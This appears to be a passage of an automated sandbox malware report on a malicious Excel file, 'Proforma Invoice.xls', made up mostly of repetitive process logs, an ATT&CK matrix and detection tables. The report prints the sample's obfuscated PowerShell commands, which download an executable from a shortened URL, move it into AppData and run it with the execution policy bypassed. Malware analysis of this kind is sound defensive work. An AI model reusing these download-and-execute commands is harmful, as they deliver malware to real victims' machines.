Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2492Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2456Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2888Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: powershell.exe, 00000009.00000002.2152606374.0000000000317000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Bypasses PowerShell execution policyShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsCommand and Scripting Interpreter11Path InterceptionProcess Injection11Masquerading1OS Credential DumpingQuery Registry1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScripting22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsExploitation for Client Execution13Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsPowerShell1Logon Script (Mac)Logon Script (Mac)Process Injection11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncSystem Information Discovery12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 320373 Sample: Proforma Invoice.xls Startdate: 19/11/2020 Architecture: WINDOWS Score: 88 28 Antivirus detection for URL or domain 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->32 34 5 other signatures 2->34 7 EXCEL.EXE 85 28 2->7         started        process3 signatures4 36 Obfuscated command line found 7->36 38 Document exploit detected (process start blacklist hit) 7->38 10 cmd.exe 7->10         started        13 cmd.exe 7->13         started        15 cmd.exe 7->15         started        process5 signatures6 40 Obfuscated command line found 10->40 17 powershell.exe 16 9 10->17         started        20 powershell.exe 7 13->20         started        22 powershell.exe 7 15->22         started        process7 dnsIp8 24 cutt.ly 104.22.1.232, 443, 49167 CLOUDFLARENETUS United States 17->24 26 shopphongtinh.com 202.92.6.10, 443, 49169, 49170 VNPT-AS-VNVNPTCorpVN Viet Nam 17->26

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Proforma Invoice.xls14%VirustotalBrowse
Proforma Invoice.xls21%ReversingLabsDocument-Word.Downloader.Powdow

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
cutt.ly1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl00%URL Reputationsafe
http://www.a-cert.at0E0%Avira URL Cloudsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.certplus.com/CRL/class3.crl00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.e-me.lv/repository00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://www.acabogacia.org/doc00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
http://crl.chambersign.org/chambersroot.crl00%URL Reputationsafe
